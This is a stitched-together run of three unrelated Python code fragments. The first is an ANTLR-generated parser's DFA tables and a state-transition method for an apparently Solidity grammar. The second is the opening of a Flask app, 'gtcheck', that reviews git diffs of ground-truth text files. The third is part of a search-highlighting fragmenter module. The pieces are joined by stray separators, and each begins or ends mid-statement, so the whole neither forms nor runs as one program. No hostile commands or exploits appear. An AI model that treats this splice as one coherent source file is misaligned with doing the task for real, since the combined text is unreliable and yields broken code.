DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #70
class DFA70(DFA):
pass
def specialStateTransition(self_, s, input):
# convince pylint that my self_ magic is ok ;)
# pylint: disable-msg=E0213
# pretend we are a member of the recognizer
# thus semantic predicates can be evaluated
self = self_.recognizer
_s = s
if s == 0:
LA70_5 = input.LA(1)
index70_5 = input.index()
input.rewind()
s = -1
if (self.synpred135_sol()):
s = 49
elif (True):
s = 1
input.seek(index70_5)
if s >= 0:
return s
elif s == 1:
LA70_6 = input.LA(1)
index70_6 = input.index()
input.rewind()
s = -1
if (self.synpred136_sol()):
s = 64
elif (True):
s = 1
input.seek(index70_6)
if s >= 0:
return s
elif s == 2:
LA70_7 = input.LA(1)
index70_7 = input.index()
input.rewind()
s = -1
if (self.synpred137_sol()):
s = 81
elif (True):
s = 1
input.seek(index70_7)
if s >= 0:
return s
elif s == 3:
LA70_8 = input.LA(1)
index70_8 = input.index()
input.rewind()
s = -1
if (self.synpred138_sol()):
s = 83
elif (True):
s = 1
input.seek(index70_8)
if s >= 0:
return s
elif s == 4:
LA70_9 = input.LA(1)
index70_9 = input.index()
input.rewind()
s = -1
if (self.synpred139_sol()):
s = 98
elif (True):
s = 1
input.seek(index70_9)
if s >= 0:
return s
elif s == 5:
LA70_10 = input.LA(1)
index70_10 = input.index()
input.rewind()
s = -1
if (self.synpred142_sol()):
s = 113
elif (True):
s = 1
input.seek(index70_10)
if s >= 0:
return s
elif s == 6:
LA70_11 = input.LA(1)
index70_11 = input.index()
input.rewind()
s = -1
if (self.synpred144_sol()):
s = 128
elif (True):
s = 1
input.seek(index70_11)
if s >= 0:
return s
elif s == 7:
LA70_12 = input.LA(1)
index70_12 = input.index()
input.rewind()
s = -1
if (self.synpred146_sol()):
s = 143
elif (True):
s = 1
input.seek(index70_12)
if s >= 0:
return s
elif s == 8:
LA70_13 = input.LA(1)
index70_13 = input.index()
input.rewind()
s = -1
if (self.synpred147_sol()):
s = 158
elif (True):
s = 1
input.seek(index70_13)
if s >= 0:
return s
elif s == 9:
LA70_14 = input.LA(1)
index70_14 = input.index()
input.rewind()
s = -1
if (self.synpred148_sol()):
s = 173
elif (True):
s = 1
input.seek(index70_14)
if s >= 0:
return s
elif s == 10:
LA70_15 = input.LA(1)
index70_15 = input.index()
input.rewind()
s = -1
if (self.synpred149_sol()):
s = 188
elif (True):
s = 1
input.seek(index70_15)
if s >= 0:
return s
elif s == 11:
LA70_16 = input.LA(1)
index70_16 = input.index()
input.rewind()
s = -1
if (self.synpred153_sol()):
s = 203
elif (True):
s = 1
input.seek(index70_16)
if s >= 0:
return s
elif s == 12:
LA70_17 = input.LA(1)
index70_17 = input.index()
input.rewind()
s = -1
if (self.synpred155_sol()):
s = 218
elif (True):
s = 1
input.seek(index70_17)
if s >= 0:
return s
elif s == 13:
LA70_18 = input.LA(1)
index70_18 = input.index()
input.rewind()
s = -1
if (self.synpred156_sol()):
s = 233
elif (True):
s = 1
input.seek(index70_18)
if s >= 0:
return s
elif s == 14:
LA70_19 = input.LA(1)
index70_19 = input.index()
input.rewind()
s = -1
if (self.synpred157_sol()):
s = 248
elif (True):
s = 1
input.seek(index70_19)
if s >= 0:
return s
elif s == 15:
LA70_20 = input.LA(1)
index70_20 = input.index()
input.rewind()
s = -1
if (self.synpred158_sol()):
s = 263
elif (True):
s = 1
input.seek(index70_20)
if s >= 0:
return s
elif s == 16:
LA70_21 = input.LA(1)
index70_21 = input.index()
input.rewind()
s = -1
if (self.synpred169_sol()):
s = 278
elif (True):
s = 1
input.seek(index70_21)
if s >= 0:
return s
if self._state.backtracking >0:
raise BacktrackingFailed
nvae = NoViableAltException(self_.getDescription(), 70, _s, input)
self_.error(nvae)
raise nvae
# lookup tables for DFA #71
DFA71_eot = DFA.unpack(
u"\50\uffff"
)
DFA71_eof = DFA.unpack(
u"\1\2\47\uffff"
)
DFA71_min = DFA.unpack(
u"\1\62\1\5\46\uffff"
)
DFA71_max = DFA.unpack(
u"\1\u0083\1\154\46\uffff"
)
DFA71_accept = DFA.unpack(
u"\2\uffff\1\2\26\uffff\1\1\16\uffff"
)
DFA71_special = DFA.unpack(
u"\50\uffff"
)
DFA71_transition = [
DFA.unpack(u"\2\2\1\uffff\5\2\2\uffff\1\2\2\uffff\2\2\4\uffff\2"
u"\2\12\uffff\1\1\2\2\22\uffff\4\2\3\uffff\27\2"),
DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff"
u"\1\2\25\uffff\1\2\10\uffff\1\2\7\uffff\1\2\12\uffff\2\2\1\31\5"
u"\uffff\1\2\10\uffff\14\2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #71
class DFA71(DFA):
pass
# lookup tables for DFA #72
DFA72_eot = DFA.unpack(
u"\50\uffff"
)
DFA72_eof = DFA.unpack(
u"\1\2\47\uffff"
)
DFA72_min = DFA.unpack(
u"\1\62\1\5\46\uffff"
)
DFA72_max = DFA.unpack(
u"\1\u0083\1\154\46\uffff"
)
DFA72_accept = DFA.unpack(
u"\2\uffff\1\2\26\uffff\1\1\16\uffff"
)
DFA72_special = DFA.unpack(
u"\50\uffff"
)
DFA72_transition = [
DFA.unpack(u"\2\2\1\uffff\5\2\2\uffff\1\2\2\uffff\2\2\4\uffff\2"
u"\2\12\uffff\1\1\2\2\22\uffff\4\2\3\uffff\27\2"),
DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff"
u"\1\2\25\uffff\1\2\10\uffff\1\2\7\uffff\1\2\12\uffff\2\2\1\31\5"
u"\uffff\1\2\10\uffff\14\2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #72
class DFA72(DFA):
pass
# lookup tables for DFA #79
DFA79_eot = DFA.unpack(
u"\21\uffff"
)
DFA79_eof = DFA.unpack(
u"\21\uffff"
)
DFA79_min = DFA.unpack(
u"\1\5\20\uffff"
)
DFA79_max = DFA.unpack(
u"\1\154\20\uffff"
)
DFA79_accept = DFA.unpack(
u"\1\uffff\1\1\1\2\16\uffff"
)
DFA79_special = DFA.unpack(
u"\21\uffff"
)
DFA79_transition = [
DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff\1"
u"\2\25\uffff\1\2\10\uffff\1\2\1\1\6\uffff\2\2\11\uffff\2\2\6\uffff"
u"\1\2\10\uffff\14\2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #79
class DFA79(DFA):
pass
# lookup tables for DFA #78
DFA78_eot = DFA.unpack(
u"\20\uffff"
)
DFA78_eof = DFA.unpack(
u"\20\uffff"
)
DFA78_min = DFA.unpack(
u"\1\5\17\uffff"
)
DFA78_max = DFA.unpack(
u"\1\154\17\uffff"
)
DFA78_accept = DFA.unpack(
u"\1\uffff\1\1\15\uffff\1\2"
)
DFA78_special = DFA.unpack(
u"\20\uffff"
)
DFA78_transition = [
DFA.unpack(u"\1\1\13\uffff\5\1\1\uffff\2\1\2\uffff\2\1\1\uffff\1"
u"\1\25\uffff\1\1\10\uffff\1\1\7\uffff\1\1\1\17\11\uffff\2\1\6\uffff"
u"\1\1\10\uffff\14\1"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #78
class DFA78(DFA):
pass
# lookup tables for DFA #80
DFA80_eot = DFA.unpack(
u"\24\uffff"
)
DFA80_eof = DFA.unpack(
u"\24\uffff"
)
DFA80_min = DFA.unpack(
u"\1\5\23\uffff"
)
DFA80_max = DFA.unpack(
u"\1\u0087\23\uffff"
)
DFA80_accept = DFA.unpack(
u"\1\uffff\1\2\1\1\21\uffff"
)
DFA80_special = DFA.unpack(
u"\24\uffff"
)
DFA80_transition = [
DFA.unpack(u"\1\2\22\uffff\5\2\1\uffff\1\2\36\uffff\2\2\1\uffff"
u"\1\1\4\uffff\1\2\2\uffff\1\2\3\uffff\1\2\3\uffff\1\2\7\uffff\2"
u"\2\2\uffff\1\2\1\uffff\1\2\5\uffff\1\2\37\uffff\1\2\1\uffff\2\2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #80
class DFA80(DFA):
pass
# lookup tables for DFA #81
DFA81_eot = DFA.unpack(
u"\152\uffff"
)
| |
<filename>gtcheck/app.py
#!/usr/bin/env python3
import datetime
import imghdr
import json
import logging
import math
import os
import re
import shutil
import webbrowser
from collections import defaultdict
from configparser import NoSectionError
from hashlib import sha256, sha1
from logging import Formatter
from logging.handlers import RotatingFileHandler
from pathlib import Path
from subprocess import check_output
import markdown
from flask import Flask, render_template, request, Markup, flash, session, redirect, url_for
from git import Repo, InvalidGitRepositoryError, GitCommandError
from .config import URL, PORT, LOG_DIR, DATA_DIR, SYMLINK_DIR, SUBREPO_DIR, ADMINPASSWORD, USERPASSWORD, SECRET_KEY
app = Flask(__name__, instance_path=str(Path(__file__).parent.resolve().joinpath("instance")))
def modifications(difftext):
"""
Extract the original and the modified characters as tuples into a list.
This information is used e.g. for the commit-message.
:param difftext:
:return:
"""
mods = []
last_pos = 1
for mod in re.finditer(r'(\[-(.*?)-\]|{\+(.*?)\+})', difftext):
sub = mod[2] if mod[2] is not None else ""
add = mod[3] if mod[3] is not None else ""
if add != "" and len(mods) > 0 and last_pos == mod.regs[0][0]:
if mods[len(mods) - 1][1] == "":
mods[len(mods) - 1][1] = add
continue
last_pos = mod.regs[0][1]
mods.append([sub, add])
return mods
def color_diffs(difftext):
"""
Adds html-tags to colorize the modified parts.
:param difftext: Compared text, differences are marked with {+ ADD +} [- DEL -]
:return:
"""
return difftext.replace('{+', '<span style="color:green">') \
.replace('+}', '</span>') \
.replace('[-', '<span style="color:red">') \
.replace('-]', '</span>')
def get_diffs(difftext):
"""
Returns textpassage which differ from origintext
:param difftext:
:return:
"""
origdiff = ' '.join([orig.split('-]')[0] for orig in difftext.split('[-') if '-]' in orig])
moddiff = ' '.join([mod.split('+}')[0] for mod in difftext.split('{+') if '+}' in mod])
return origdiff, moddiff
def surrounding_images(img, regex):
"""
Finding predecessor and successor images to gain more context for the user.
The basic regex to extract the pagenumber can be set on the setup page and
is kept in the repo_data['regexnum'] variable (Default ^(.*?)(\d+)(\D*)$).
:param img: Imagename
:param regex: regexpattern to extract the pagenumber
:return:
"""
imgmatch = re.match(rf"{regex}", img.name)
imgint = int(imgmatch[2])
imgprefix = img.name[:imgmatch.regs[1][1]]
imgpostfix = img.name[imgmatch.regs[3][0]:]
prev_img = img.parent.joinpath(
imgprefix + f"{imgint - 1:0{imgmatch.regs[2][1] - imgmatch.regs[2][0]}d}" + imgpostfix)
post_img = img.parent.joinpath(
imgprefix + f"{imgint + 1:0{imgmatch.regs[2][1] - imgmatch.regs[2][0]}d}" + imgpostfix)
if not prev_img.exists():
app.logger.info(f"File:{prev_img.name} not found!")
prev_img = ""
if not post_img.exists():
app.logger.info(f"File:{post_img.name} not found!")
post_img = ""
return prev_img, post_img
def get_gitdifftext(orig, diff, repo):
"""
Compares two strings via git hash-objects
:param orig: Original string
:param diff: Modified string
:param repo: repo instance
:return:
"""
item_a = sha1((f'blob {len(orig)}\0{orig}').encode('utf-8'))
item_b = sha1((f'blob {len(diff)}\0{diff}').encode('utf-8'))
return check_output(['git', 'diff', '-p', '--word-diff', str(item_a.hexdigest()), str(item_b.hexdigest())]).decode(
'utf-8').split('@@')[-1].strip()
def get_difftext(origtext, item, folder, repo):
"""
Compares the original and a modified string
:param origtext: original text string
:param item: git-python item instances
:param folder: repo folder
:param repo: repo instance
:return:
"""
# The "<<<<<<< HEAD" indicates a merge conflicts and need other operations
if "<<<<<<< HEAD\n" in origtext:
with open(folder.joinpath(item.a_path), 'r') as fin:
mergetext = fin.read().split("<<<<<<< HEAD\n")[-1].split("\n>>>>>>>")[0].split("\n=======\n")
difftext = get_gitdifftext(mergetext[0], mergetext[1], repo)
else:
try:
difftext = "".join(item.diff.decode('utf-8').split("\n")[1:])
except UnicodeDecodeError as ex:
# The UnicodeDecodeError mostly appears if the original character is a combination of unicode symbols
# e.g. ä -> e+diacritic_mark and the modified character only differs in one and not all parts e.g. ö.
app.logger.warning(f"File:{item.a_path} Warning the diff text could not be decoded! Error:{ex}")
try:
difftext = get_gitdifftext(origtext, item.b_blob.data_stream.read().decode(), repo)
except Exception as ex2:
app.logger.warning(f"File:{item.a_path} Both files could not be compared! Error:{ex2}")
difftext = ""
return difftext
class GTDiffObject(object):
def __init__(self, repo, repo_path, filename, add_all=False):
self.repo = repo
self.repo_path = repo_path
self.filename = filename
self.fpath = self.repo_path.joinpath(filename)
self.item = None
self.origtext = ''
self.difftext = ''
self.modtext = ''
self.modtype = ''
self.diffcolored = ''
self.__diff__(add_all)
def __diff__(self, add_all):
self.item = self.repo.index.diff(None, paths=[self.filename], create_patch=True, word_diff_regex='.')
# TODO: Check if this is necessary
if not self.item:
self.item = self.repo.index.diff('HEAD', paths=[self.filename], create_patch=True, word_diff_regex='.')
if not self.item and add_all:
self.path = self.filename
self.origtext = ""
self.difftext = open(Path(self.repo.working_dir).joinpath(self.filename), 'r').read()
self.modtext = self.difftext
self.modtype = "new"
self.diffcolored = "<span style='color:green'>The file gets added " \
"when committed and deleted when stashed!</span>"
else:
if self.item:
self.item = self.item[0]
else:
#self.item = None
self.repo.git.add('-A', self.filename)
item = self.repo.index.diff('HEAD', paths=[self.filename])
if item != []:
self.item = item[0]
else:
self.item = None
if self.item and (self.item.a_blob or self.item.b_blob):
self.get_modtext()
def get_modtext(self):
self.modtype = self.repo.git.status('--porcelain', self.filename).split(' ')[0]
try:
self.origtext = self.item.a_blob.data_stream.read().decode('utf-8').lstrip(" ")
self.path = self.item.a_path
except:
self.origtext = ""
self.path = self.item.b_path
self.mergetext = []
if self.modtype == "A":
if self.origtext != "":
self.modtext = self.origtext
self.origtext = ""
self.modtype = "new"
self.diffcolored = "<span style='color:green'>This untracked file gets added " \
"when committed and deleted when stashed!</span>"
return
elif self.modtype == "D":
if self.modtext != "":
self.modtext = self.origtext
self.origtext = ""
self.modtype = "del"
self.modtext = ""
self.diffcolored = "<span style='color:red'>This file gets deleted " \
"when committed and restored when stashed!</span>"
return
self.difftext = get_difftext(self.origtext, self.item, self.repo_path, self.repo)
self.diffcolored = color_diffs(self.difftext)
if self.modtype == "M":
self.modtype = "merge"
self.modtext = self.mergetext[1]
else:
self.modtext = self.repo_path.absolute().joinpath(self.item.b_path).open().read().lstrip(" ")
def diff_only_in_cc(self):
return self.origtext.strip() == self.modtext.strip() and self.origtext.strip() != ""
def validate_filter(self, filter_all, filter_from, filter_to):
# Apply filter options
if filter_all + filter_from + filter_to != '':
if filter_all != '':
if not (re.search(rf"{filter_all}", self.origtext) or
re.search(rf"{filter_all}", self.modtext)):
return True
if filter_from + filter_to != '':
origdiff, moddiff = get_diffs(self.difftext)
if not (re.search(rf"{filter_from}", origdiff) and
re.search(rf"{filter_to}", moddiff)):
return True
return False
def mods(self):
return modifications(self.difftext)
def from_list_to_list(repo_data, from_list='diff_list', to_list='skipped', index=0, all=False):
if all:
repo_data[to_list] = repo_data[from_list]+repo_data[to_list]
repo_data[from_list] = []
else:
repo_data[to_list].append(repo_data[from_list].pop(index))
return
@app.route('/gtcheck/edit/<group_name>/<repo_path_hash>/<subrepo>', methods=['GET', 'POST'])
def gtcheck(group_name, repo_path_hash, subrepo, repo=None, repo_data=None):
"""
Gathers the information to render the gtcheck
:return:
"""
repo_data_path = get_repo_data_path(group_name, repo_path_hash, subrepo)
if repo_data is None:
repo_data = get_repo_data(repo_data_path)
if repo is None:
repo = get_repo(repo_data.get('path'))
repo_path = Path(repo_data.get('path'))
username, email = get_git_credentials(repo)
# Diff Head
diff_head = repo.git.diff('--cached', '--shortstat').strip().split(" ")[0]
if not repo_data.get('diff_list') or len(repo_data.get('diff_list')) <= 0:
repo_data['diff_list'] = alphanum_sort([item.a_path for item in repo.index.diff(None) if ".gt.txt" in item.a_path])
diff_list = repo_data.get('diff_list')[:]
for filename in diff_list:
gtdiff = GTDiffObject(repo, repo_path, filename)
if gtdiff.item is None:
from_list_to_list(repo_data, from_list='diff_list', to_list='removed_list')
continue
if gtdiff.diff_only_in_cc() and repo.data('skipcc'):
if repo_data.get('addcc', None) is not None:
from_list_to_list(repo_data, from_list='diff_list', to_list='finished_list')
repo.git.add(str(filename), A=True)
else:
from_list_to_list(repo_data, from_list='diff_list', to_list='skipped_list')
continue
if gtdiff.validate_filter(repo_data.get('filter_all'), repo_data.get('filter_from'), repo_data.get('filter_to')):
from_list_to_list(repo_data, from_list='diff_list', to_list='skipped_list')
continue
if diff_head:
commitmsg = f"Staged Files: {diff_head}"
else:
commitmsg = f"{repo_path.name}: {', '.join([orig + ' -> ' + mod for orig, mod in gtdiff.mods()])}"
repo_data['modtext'] = gtdiff.modtext
repo_data['modtype'] = gtdiff.modtype
repo_data['fname'] = str(gtdiff.fpath)
repo_data['fpath'] = str(gtdiff.path)
custom_keys = [' '.join(repo_data.get('custom_keys')[i:i + 10]) for i in
range(0, len(repo_data.get('custom_keys')), 10)]
if repo_data['mode'] == 'main':
inames = [Path(SYMLINK_DIR).joinpath(repo_path_hash).joinpath(str(iname.relative_to(repo_data['path'])))
for iname in gtdiff.fpath.parent.glob(f"{gtdiff.fpath.name.replace('gt.txt', '')}*")
if imghdr.what(iname)]
else:
inames = [Path(SYMLINK_DIR).joinpath(repo_path_hash).joinpath(str(iname.relative_to(repo_data['parent_repo_path']))) for iname in
Path(repo_data['parent_repo_path']).glob(f"{str(gtdiff.fpath.relative_to(repo_data.get('path'))).replace('gt.txt', '')}*")
if imghdr.what(iname)]
img_out = inames[0] if inames else None
if not img_out:
write_repo_data(repo_data_path, repo_data)
return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
group_name=group_name,
branch=repo.active_branch, username=username,
email=email, commitmsg=commitmsg,
difftext=Markup(gtdiff.diffcolored), origtext=gtdiff.origtext, modtext=gtdiff.modtext,
files_left=str(len(repo_data.get('diff_list'))),
iname="No image", fname=gtdiff.fpath.name, skipped=len(repo_data.get('skipped_list')),
vkeylang=repo_data.get('vkeylang'), custom_keys=custom_keys,
font=repo_data.get('font'))
else:
prev_img, post_img = surrounding_images(img_out, repo_data.get('regexnum'))
write_repo_data(repo_data_path, repo_data)
return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
group_name=group_name,
branch=repo.active_branch, username=username,
email=email, commitmsg=commitmsg,
image=str(Path(img_out).relative_to(Path(SYMLINK_DIR).parent)),
previmage=str(Path(prev_img).relative_to(Path(
SYMLINK_DIR).parent)) if prev_img != "" else "",
postimage=str(Path(post_img).relative_to(Path(
SYMLINK_DIR).parent)) if post_img != "" else "",
difftext=Markup(gtdiff.diffcolored), origtext=gtdiff.origtext,
modtext=gtdiff.modtext,
files_left=str(len(repo_data.get('diff_list'))),
iname=img_out.name, fname=gtdiff.fpath.name,
skipped=len(repo_data.get('skipped_list')),
vkeylang=repo_data.get('vkeylang'), custom_keys=custom_keys,
font=repo_data.get('font'))
else:
if diff_head:
commitmsg = f"Staged Files: {diff_head}"
modtext = f"Please commit the staged files! You skipped {len(repo_data.get('skipped_list'))} files."
write_repo_data(repo_data_path, repo_data)
return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
group_name=group_name,
username=username, email=email, commitmsg=commitmsg, modtext=modtext, custom_keys='',
files_left="0")
if repo_data.get('diff_list', None) == []:
write_repo_data(repo_data_path, repo_data)
return render_template("nofile.html")
write_repo_data(repo_data_path, repo_data)
return gtcheck(group_name, repo_path_hash, subrepo, repo, repo_data)
def pop_idx(repo_data, lname, popidx):
"""
Pops the item from the index off a list, if the index is in the range
:param lname: Name of the list
:param popidx: Index to pop
:return:
"""
if len(repo_data.get(lname)) > popidx:
repo_data[lname].pop(popidx)
return
def set_git_credentials(repo, username, email, level='repository'):
""" Set the git credentials name and email address."""
try:
if Path(repo.git_dir).joinpath('config.lock').exists():
Path(repo.git_dir).joinpath('config.lock').unlink()
repo.config_writer().set_value(level, 'name', username).release()
repo.config_writer().set_value(level, 'email', email).release()
except:
pass
def get_git_credentials(repo, level='repository'):
""" Return the git credentials name and email address."""
username, email = "", ""
try:
username = repo.config_reader().get_value(level, 'name')
email = repo.config_reader().get_value(level, 'email')
except NoSectionError:
pass
return username, email
@app.route('/gtcheck/edit/update/<group_name>/<repo_path_hash>/<subrepo>', methods=['GET', 'POST'])
def edit(group_name, repo_path_hash, subrepo):
"""
Process the user input from gtcheck html pages
:return:
"""
data = | |
be called with an iterator of ALL tokens from the text,
with the tokens for matched terms having the ``matched`` attribute set
to True.
If this method returns False, the fragmenter's ``fragment_matches``
method will be called with a LIST of matching tokens.
"""
return True
def fragment_tokens(self, text, all_tokens):
"""Yields :class:`Fragment` objects based on the tokenized text.
:param text: the string being highlighted.
:param all_tokens: an iterator of :class:`analysis.Token`
objects from the string.
"""
raise NotImplementedError
def fragment_matches(self, text, matched_tokens):
"""Yields :class:`Fragment` objects based on the text and the matched
terms.
:param text: the string being highlighted.
:param matched_tokens: a list of :class:`analysis.Token` objects
representing the term matches in the string.
"""
raise NotImplementedError
class WholeFragmenter(Fragmenter):
"""Doesn't fragment the token stream. This object just returns the entire
entire stream as one "fragment". This is useful if you want to highlight
the entire text.
Note that even if you use the `WholeFragmenter`, the highlight code will
return no fragment if no terms matched in the given field. To return the
whole fragment even in that case, call `highlights()` with `minscore=0`::
# Query where no terms match in the "text" field
q = query.Term("tag", "new")
r = mysearcher.search(q)
r.fragmenter = highlight.WholeFragmenter()
r.formatter = highlight.UppercaseFormatter()
# Since no terms in the "text" field matched, we get no fragments back
assert r[0].highlights("text") == ""
# If we lower the minimum score to 0, we get a fragment even though it
# has no matching terms
assert r[0].highlights("text", minscore=0) == "This is the text field."
"""
def __init__(self, charlimit=DEFAULT_CHARLIMIT):
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
charlimit = self.charlimit
matches = []
for t in tokens:
if charlimit and t.endchar > charlimit:
break
if t.matched:
matches.append(t.copy())
return [Fragment(text, matches)]
# Backwards compatiblity
NullFragmeter = WholeFragmenter
class SentenceFragmenter(Fragmenter):
"""Breaks the text up on sentence end punctuation characters
(".", "!", or "?"). This object works by looking in the original text for a
sentence end as the next character after each token's 'endchar'.
When highlighting with this fragmenter, you should use an analyzer that
does NOT remove stop words, for example::
sa = StandardAnalyzer(stoplist=None)
"""
def __init__(self, maxchars=200, sentencechars=".!?",
charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
"""
self.maxchars = maxchars
self.sentencechars = frozenset(sentencechars)
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
maxchars = self.maxchars
sentencechars = self.sentencechars
charlimit = self.charlimit
textlen = len(text)
# startchar of first token in the current sentence
first = None
# Buffer for matched tokens in the current sentence
tks = []
endchar = None
# Number of chars in the current sentence
currentlen = 0
for t in tokens:
startchar = t.startchar
endchar = t.endchar
if charlimit and endchar > charlimit:
break
if first is None:
# Remember the startchar of the first token in a sentence
first = startchar
currentlen = 0
tlength = endchar - startchar
currentlen += tlength
if t.matched:
tks.append(t.copy())
# If the character after the current token is end-of-sentence
# punctuation, finish the sentence and reset
if endchar < textlen and text[endchar] in sentencechars:
# Don't break for two periods in a row (e.g. ignore "...")
if endchar + 1 < textlen and text[endchar + 1] in sentencechars:
continue
# If the sentence had matches and it's not too long, yield it
# as a token
if tks and currentlen <= maxchars:
